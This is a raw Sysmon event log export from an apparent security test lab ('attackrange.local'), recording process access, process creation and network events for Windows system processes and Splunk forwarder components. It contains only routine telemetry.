10341000x8000000000000000982202Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:26.366{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982201Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:26.366{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982200Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:26.366{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982199Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:26.366{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982198Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:26.366{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982197Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:26.366{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982196Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:26.350{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982195Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:26.350{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982194Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:26.350{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8EBA-6151-387A-00000000FD01}1128C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000982193Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:26.350{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8EBA-6151-387A-00000000FD01}1128C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000982192Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:26.335{69CF5F33-8EBA-6151-387A-00000000FD01}1128C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001057888Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:27.103{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F42CE8A84C4683E974C3C0612C8D4705,SHA256=4F7DEF95C8044DA694203D74F318F41318F0B889D1897B158A7277590EB67CF8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000982236Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.913{69CF5F33-8EBB-6151-3A7A-00000000FD01}31402460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982235Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.757{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8EBB-6151-3A7A-00000000FD01}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982234Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.757{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982233Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.757{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982232Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.757{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982231Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.757{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982230Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.757{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982229Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.757{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982228Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.757{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982227Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.757{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982226Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.757{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000982225Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.757{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8EBB-6151-3A7A-00000000FD01}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000982224Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.757{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8EBB-6151-3A7A-00000000FD01}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000982223Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.742{69CF5F33-8EBB-6151-3A7A-00000000FD01}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000982222Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:23.695{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51857-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x8000000000000000982221Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:27.069{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8EBB-6151-397A-00000000FD01}1232C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 